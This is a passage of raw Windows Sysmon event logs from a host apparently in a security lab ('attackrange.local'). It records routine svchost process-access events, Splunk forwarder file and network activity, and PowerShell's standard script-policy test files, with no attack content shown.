10341000x800000000000000010110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.347{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7067F4A98228DC8B8957DC46C9FFF99B,SHA256=FA7211514DADCF761BB65320E1C698ED14436801E0A817F59AE7345E083EBCD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:48.878{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:48.862{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE38AC900C40D5714F548AC011B60985,SHA256=6E2D688FBDA4499DC234F042FEC932F9A783E813B52E9764E351B4ED4779F6CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:46.587{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53673-false10.0.1.12-8000- 23542300x800000000000000010123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:49.940{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0F7FFFC943DE2B3DC95DA8E52B51BB3,SHA256=487E14698959B5EB37C40E08594BC15DB541AE1E1CD9799602D171AEC89B6071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:50.955{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1F5297EE76F6505E3026EBF47DD3ACC,SHA256=DAEE3C9CC177986703DD776B92FAF62A00F50F8C19C9025352A5F500E256C6AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:49.243{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53674-false10.0.1.12-8089- 23542300x800000000000000010129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.971{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C02F3CC0E8773B008A41E9C6D1CC84C,SHA256=F0EE6CD0672A08D10F46DE2204C49180291538DE1B5232B8AC9D109ECFA4C6BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.393{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lmgxl1tf.ev3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.393{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_14wxw500.v2k.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.393{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_14wxw500.v2k.ps12021-03-31 12:06:51.393 23542300x800000000000000010130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:52.299{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 